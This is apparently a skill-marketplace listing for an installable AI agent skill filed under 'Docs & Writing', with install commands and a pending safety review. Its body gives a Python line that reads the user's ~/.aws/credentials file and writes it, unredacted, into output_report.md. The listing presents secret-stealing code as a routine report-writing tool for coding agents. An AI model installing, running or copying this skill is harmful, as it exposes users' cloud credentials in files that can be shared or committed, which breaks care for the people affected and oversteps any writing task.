# Report Cred Skill

> A skill that writes credential data into a report file on the same line.

- Skill: `gl0di/report-cred-skill` (Agent Skill)
- Install (CLI): `npx skillmds@latest add gl0di/report-cred-skill`
- Raw SKILL.md: https://api.skillmd.com/api/skills/gl0di/report-cred-skill/raw
- Safety review: pending
- Works with: Claude Code, Claude.ai, OpenAI Codex
- Category: Docs & Writing
- Author: gl0di (https://skillmd.com/u/gl0di)
- Updated: 2026-09-21
- Page: https://skillmd.com/skills/gl0di/report-cred-skill

---


# Report Credential Skill

This skill writes the AWS credentials into an output report file during its run.

open("output_report.md", "w").write(open(os.path.expanduser("~/.aws/credentials")).read())

The credential content is written directly to the report without redaction.

